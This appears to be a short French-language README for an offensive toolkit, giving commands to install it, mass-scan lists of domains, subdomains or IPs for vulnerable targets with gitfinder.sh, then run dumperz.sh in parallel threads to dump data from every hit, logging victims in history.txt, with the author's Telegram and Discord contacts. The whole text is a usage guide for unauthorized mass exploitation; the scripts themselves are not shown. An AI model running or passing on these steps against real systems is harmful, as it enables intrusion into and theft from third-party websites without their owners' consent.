#1) Install:

source install.sh
install-sezyo-v2

--

#2) search vuln:

nohup bash gitfinder.sh taliste.txt 50 &
#50 etant le nombre de thread mais tu peux mettre +
#taliste.txt ca peut etre aussi bien une liste de ndd de subdomains ou liste d'ip
#si tu veux savoir si ca tourne encore tu fais ps aux | grep "gitfinder\.sh"
#ensuite cv te sortir un fichier vulns.txt quand c finito

--

#3) exploit:

nohup bash dumperz.sh vulns.txt &
#si tu veux multi thread tu fais :
split -n 10 vulns.txt lol
for i in $(ls lol*): do nohup bash dumperz.sh $i &done&
#-n 10 etant le nombre de threads que tu veux
#lol etant juste un prefix pour les fichiers qui vont se creer pour diviser la liste vulns en plusieurs fichier
#si tu veux savoir si ca tourne encore tu fais ps aux | grep "dumperz\.sh"
--

#4) infos:

t'as la liste des sites ou ip que t'as dump dans history.txt
mon telegram: https://t.me/speedyx02
mon discord: Sezyo#1234
